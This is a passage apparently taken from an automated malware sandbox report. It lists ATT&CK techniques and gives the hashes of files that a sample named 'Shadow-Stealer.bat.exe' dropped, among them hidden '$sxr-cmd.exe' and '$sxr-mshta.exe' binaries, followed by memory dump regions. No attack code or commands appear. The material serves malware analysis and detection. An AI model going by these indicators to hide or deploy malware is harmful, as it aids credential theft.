- Modifies registry class
PID:3492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.13525c67-d246-49b1-9cc9-aaea80c983f7.tmp.csv

Filesize
37KB

MD5
120dfd230113d7564374f16309415b42

SHA1
43a47aad948a8439c582fe61b7aa90595254870c

SHA256
b2efe62d0970e670457d53676caee2888956ebaa66450fac9d45a2e4301b4bde

SHA512
6bd90034fdcdaf9b6f738c1bc72e1639affb8f595194263f318366d36c2019fd32000afe6bb407e25fc4718bc099efcff1ab4bd431f712dff498cee7f0033d44

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b635f1f-dbf4-4168-933a-a601aed43ea3.tmp.txt

Filesize
13KB

MD5
b9bc230d8f68396be986edde3b3c121a

SHA1
3ca9e4ce80a10d44561ca568c2ab00125258e68d

SHA256
16f93c086e7e5801ec888eb096660d80199c143869548ac5d73af5121836a92d

SHA512
191811eb896cc8a8a926935616040a8a35aabb7c269ee4625a00a81193f66e92e9439e05032cedb2be76eef773a3e11fb3e894870899bb05f432c5d30b5693f3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de27bd6-27d3-4e8b-8fb8-ed8767f6d008.tmp.csv

Filesize
39KB

MD5
7063770dc9c0bfd9224d259979ff24d0

SHA1
996fa6a4cd8dbe3e95e22642a2d6896c5024a8f1

SHA256
3221a00201b27de4df7a6156b6c9d1beb8f431584f4ffcce1b010ecbb27fc738

SHA512
75e8a4499fb9e1eeed31dfccc247d115c26887498b6ba6ad28a96c93974ab33513072805a1c6e43f19ecfc9e89283da7040a55b155fd144827b5901d3ed37481

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6bc79591-81e3-462e-9757-2417cf610904.tmp.txt

Filesize
13KB

MD5
13ef68fb4e61d63143470b36786c4484

SHA1
00007ae99e2ae4bf7e4e1fb15a7927d42c1b5fce

SHA256
1e1e523890db643d90d9beb9bd555c9e58569c4f4a5329d2c3170e5a6587ec11

SHA512
52f81da16f8267940caf756eb2f6978a2984311a3e5e8fc70050b72d6ab81e018c78f567e507cfed1c8338efeb0df71938146ac0ed33751b2850888fdcc266f3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6f8a75da-a379-4005-81bb-d5cfc52bf66b.tmp.txt

Filesize
13KB

MD5
5b8b8068b70178bdd1483260e217005f

SHA1
d86c188fa292eb90dbbea10dc436f08a4f4b7d7d

SHA256
dbbdee25e509424692054df561c393aaae51ee8fb80b873323a15152b1b4bde7

SHA512
d54e6140a28c4575ab98be30e4290cf4defdb873214379f58c651e496c79ea94572369133945510b7d54d6e63e71c3711f4c02ef360d4212996e199fb84867dc

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.73d7450b-e12d-4fe1-b79d-4b898a10ab60.tmp.csv

Filesize
36KB

MD5
3a3667a8167841dd05fd5659a3f792fc

SHA1
2f10890642fd8967216030118f71878ba354a85b

SHA256
f6aeedfacb6337bc5385697d671879fcb041743cec6d334c254f38c3957688c0

SHA512
08ae11df864fc5dcf531483ba622f6b67f88ac90b3bdc58d5dfadbbe681f14edd745c1b09c5a42780763c16ddb41c45379512c23a50d504e2a38f31201fd098c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a06089-492f-42f6-b935-86a105cb6905.tmp.csv

Filesize
38KB

MD5
95cb02d483fe046902d3b478920a5658

SHA1
a9a08b5aa0fe9d8e37d38d251df3b61cbeed027f

SHA256
0217b3642b98ee92d4947c252a6460b5a69723872819f2b553149e2035133f5b

SHA512
7c627629cf83d85b76f6fe9e2cd968dd1795627d81a6bb22fa451db63d40caa5d77533432313eaa65def4aa1b21756b53d3f8cf02e35c18e1eec9b1e1dcf7404

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ada51214-6507-4896-8df6-667eb1b78be9.tmp.csv

Filesize
40KB

MD5
01cb1d4788f45c401ab79452e5ba54c8

SHA1
f5044f4415229350f313551c3d8221a7775e5767

SHA256
5225483c288be5934f80e3da246bc20f49b8b85e87fd74d1e9e6c6fb229ecd2a

SHA512
1059a6e3a10dfa77ecf8cea94734f6787adca0a3ef9663c620029047ea8a52d32114a7d98057e875dc711d15e0da577e4efbf76eb8d0ac78a1fea40a16d0232f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b7dc8a3a-917a-4108-aa68-babea3ea7976.tmp.csv

Filesize
38KB

MD5
5084e8d0b89b8deb8fe1332866c55c28

SHA1
310daebcc4d4a1c3f596826324ca3444786f3b56

SHA256
a1ab8d1104743938c60543f0d869ba6810a0918f39f2ff75b61791ecb9e33429

SHA512
fa21f03f09d6095ab1d60907c56f2a8025931df311c2fabfa631d2c348b3fa9d66e5c5e17b7d1f5ee09d464d415dd8d949a79db10da47d9df61418f4ea67b589

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b887b74b-fc56-4986-9735-6b2e57235bca.tmp.txt

Filesize
13KB

MD5
48a532728c1b15dc689bc65579f7117d

SHA1
2b8ed745721c0152553a6a9a6d7d2df023dd605b

SHA256
8a79d5b5dfd9cc891678e5fd58f229dc3aadaceec769d435dc1ca3dc1611764b

SHA512
bb2141c3966062351b85406d45845039a7c292efcf7617e5e35ebffde2b705bb6c1005920326b26ba22b57115ecd387d0c2e2cf682b1e0c8af87f966fd68c245

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bb5d6639-1f2b-4ff2-b97d-0a444c98fe71.tmp.txt

Filesize
13KB

MD5
068d45478c1a2de352808afef100814e

SHA1
b41065c9ffe1cb525da16aa856c2cfaafce2d82f

SHA256
9947084d90b2627cd48ea3552cb24943dfacb1d54f72cde8724b0ac2fabd93bc

SHA512
f81bea8eb91462e1ca1298380cfdd9c446580c60b76b91bb86798d79c533548fc305378060e3d43e09dfcc1223b175d225f551163d026e67c61cbfa08675a403

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d196a0d9-62fe-4327-b08f-bb9ff5b1ec9b.tmp.txt

Filesize
13KB

MD5
4d5b955f5cd01bc211f1a5171b206ada

SHA1
b22825b3ec9c7e68801fad0bc4ee8e351446c95c

SHA256
e53e8975b34fc62b24856588b1642cef8db319125bdb05b6c5793b11516379c6

SHA512
6b8330d266ce448a955283a5736f1eb9f6c5065d9b76e4b38500af9a38723745fc887f7b60270a68cd4fcd28468f4872076f7bd19b5eb924a64c14394f8b67b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
cb9ee6118f51a0a5430cca6cbc4e2df8

SHA1
231c6223dee2094738bd65210e56dddfde19ebf9

SHA256
7e134f47993f776d4000d86c6940491bf682735097997d3df713592a83267404

SHA512
5fb227f526c6d93e55e0e7e504d1336d6ed5ec60f62d18771c2d3970bd25f3a0c4f5619162d33a66f1495850a6f16bff0deabf9f2752053fc84cca16312349d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uee1a3a3.oxg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
713235d54dfa7cc46c168aff278a35e5

SHA1
8a2420651da8dfb4f3a2fc2d74a0174813709ecd

SHA256
af8df51b7bb0977ed751957cdbc25e4bd55ebe37f3382cd94246dff58a0ce0e1

SHA512
359d3ed14ad983dca7c1645540f62ef809620d7518e27bca731fb2946c3658601b8ed7c73952c985cda6a8516434cb920094ba27120731c759b7c8d15b6b5154

Download Submit
memory/428-109-0x0000020EE6940000-0x0000020EE6967000-memory.dmp

Filesize
156KB

Download
memory/428-110-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/456-118-0x0000019D7E9D0000-0x0000019D7E9F7000-memory.dmp

Filesize
156KB

Download
memory/456-119-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/608-107-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/608-101-0x0000028B2FDD0000-0x0000028B2FDF2000-memory.dmp

Filesize
136KB

Download
memory/608-102-0x0000028B30050000-0x0000028B30077000-memory.dmp

Filesize
156KB

Download
memory/696-104-0x00000202CE2F0000-0x00000202CE317000-memory.dmp

Filesize
156KB

Download
memory/696-112-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/976-128-0x000002CF9FB00000-0x000002CF9FB27000-memory.dmp

Filesize
156KB

Download
memory/976-129-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/980-114-0x00000143C5B10000-0x00000143C5B37000-memory.dmp

Filesize
156KB

Download
memory/980-115-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/1056-131-0x000001E5698E0000-0x000001E569907000-memory.dmp

Filesize
156KB

Download
memory/1056-132-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/1068-134-0x00000268087B0000-0x00000268087D7000-memory.dmp

Filesize
156KB

Download
memory/1068-135-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/1160-138-0x00007FF845650000-0x00007FF845660000-memory.dmp

Filesize
64KB

Download
memory/1160-137-0x0000023CB6AA0000-0x0000023CB6AC7000-memory.dmp

Filesize
156KB

Download
memory/3376-91-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/3376-65-0x000001C72C3F0000-0x000001C72C976000-memory.dmp

Filesize
5.5MB

Download
memory/3376-80-0x000001C72D690000-0x000001C72D852000-memory.dmp

Filesize
1.8MB

Download
memory/3376-89-0x000001C72D340000-0x000001C72D37C000-memory.dmp

Filesize
240KB

Download
memory/3376-90-0x000001C72D2A0000-0x000001C72D2EE000-memory.dmp

Filesize
312KB

Download
memory/3376-78-0x000001C72D2F0000-0x000001C72D340000-memory.dmp

Filesize
320KB

Download
memory/3376-67-0x000001C735220000-0x000001C73565E000-memory.dmp

Filesize
4.2MB

Download
memory/3376-93-0x00007FF884550000-0x00007FF88460D000-memory.dmp

Filesize
756KB

Download
memory/3376-94-0x000001C72D380000-0x000001C72D3B6000-memory.dmp

Filesize
216KB

Download
memory/3376-68-0x000001C735660000-0x000001C735712000-memory.dmp

Filesize
712KB

Download
memory/3376-63-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/3376-64-0x00007FF884550000-0x00007FF88460D000-memory.dmp

Filesize
756KB

Download
memory/3376-79-0x000001C72D400000-0x000001C72D4B2000-memory.dmp

Filesize
712KB

Download
memory/3376-66-0x000001C734A50000-0x000001C73521A000-memory.dmp

Filesize
7.8MB

Download
memory/3376-69-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/3852-40-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/3852-36-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4656-96-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4656-97-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/4656-98-0x00007FF884550000-0x00007FF88460D000-memory.dmp

Filesize
756KB

Download
memory/4656-99-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4656-95-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4804-34-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4804-32-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5052-92-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-23-0x0000028700330000-0x0000028700D80000-memory.dmp

Filesize
10.3MB

Download
memory/5052-35-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-39-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-31-0x00000287011E0000-0x00000287011EA000-memory.dmp

Filesize
40KB

Download
memory/5052-29-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/5052-28-0x0000028700EF0000-0x0000028700F12000-memory.dmp

Filesize
136KB

Download
memory/5052-27-0x0000028700E90000-0x0000028700EE8000-memory.dmp

Filesize
352KB

Download
memory/5052-50-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-26-0x0000028700E30000-0x0000028700E86000-memory.dmp

Filesize
344KB

Download
memory/5052-25-0x0000028700D80000-0x0000028700E26000-memory.dmp

Filesize
664KB

Download
memory/5052-75-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp

Filesize
8KB

Download
memory/5052-22-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-21-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-20-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-18-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

Filesize
2.0MB

Download
memory/5052-19-0x00007FF884550000-0x00007FF88460D000-memory.dmp

Filesize
756KB

Download
memory/5052-17-0x0000028700000000-0x0000028700024000-memory.dmp

Filesize
144KB

Download
memory/5052-16-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-1533-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-15-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-5-0x000002877AC40000-0x000002877AC62000-memory.dmp

Filesize
136KB

Download
memory/5052-14-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

Filesize
10.8MB

Download
memory/5052-4-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp

Filesize
8KB

Download